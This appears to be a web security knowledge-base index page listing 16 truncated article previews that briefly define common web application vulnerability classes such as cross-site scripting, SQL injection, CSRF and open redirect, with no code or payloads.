Showing 16 articles

Showing 16 articles

#1

Cross-Site Scripting



A web application's output is rendered as a web page. If user input is included in the web application output, then it is also rendered as a part of the web page. If user input is included in output w...

#2

Insecure Direct Object References



Insecure direct object reference vulnerabilities occur when an application exposes the system names of system resources that it uses and allows an attacker to manipulate these names. If an attacker ca...

#3

Insufficient Authentication



Insufficient authentication vulnerabilities occur when the application allows users to perform sensitive operations or access sensitive information without properly checking their authentication crede...

#4

Insufficiently Protected Credentials



An insufficiently protected credential weakness occurs when the application doesn't store or transmit the authentication credentials securely. If the passwords are not hashed and salted, an attacker m...

#5

Code Injection



Scripting languages often have functions, such as eval(), that allow interpreting a string or a file as a part of the application. The danger of using these functions is that, under certain conditions...

#6

Cross-Site Request Forgery



A cross site request forgery (CSRF) attack occurs when an attacker tricks a victim into loading a page that contains a malicious request. This request might be able to change the state of the web appl...

#7

XML Injection



XML injection occurs when an attacker is able to supply data to the application that is interpreted as a part of an XML document in a manner that violates the intended use of XML by the application. X...

#8

LDAP Injection



Lightweight Directory Access Protocol (LDAP) is a widely used protocol for accessing directory services. Directories provide a set of attributes about people that are organized in a hierarchical manne...

#9

Insecure Transport



TLS should be used to protect any sensitive data in transit. Some applications don't use TLS even during authentication or when transmitting sensitive data, and an attacker might be able to intercept...

#10

Open Redirect



Many web applications use URL redirection to direct a user to another site or page on the same site. Some web sites make it possible to manipulate the destination of the URL redirection. An attacker m...

#11

Command Injection



Applications often execute external commands as a part of their functionality. If the attacker is able to manipulate the choice of external commands or their parameters, the attacker will be able to a...

#12

Insufficient Authorization



Insufficient authorization vulnerabilities occur when the application allows a user to perform an action without checking if the user has sufficient privileges to carry it out. This allows attackers t...

#13

SQL Injection



SQL injection is a type of vulnerabilities in database access code that allows attackers to execute unauthorized queries on the database. SQL Injection vulnerabilities are caused by concatenating data...

#14

Using Components with Known Vulnerabilities



“Using components with known vulnerabilities” refers to an application that uses third-party code that contains known vulnerabilities. The result is that the vulnerabilities in the third-party code be...

#15

Sensitive Cookie in HTTPS Session without Secure Attribute



When a Cookie has the Secure flag set, that cookie will not be sent over a non-encrypted connection. If the Secure attribute is not set on a sensitive cookie, the cookie will be sent in plaintext and...

#16

Cookieless Authentication



Most web applications use cookies to keep track of session state. Some applications use other mechanisms to keep track of authenticated sessions. These custom authentication schemes are usually vulner...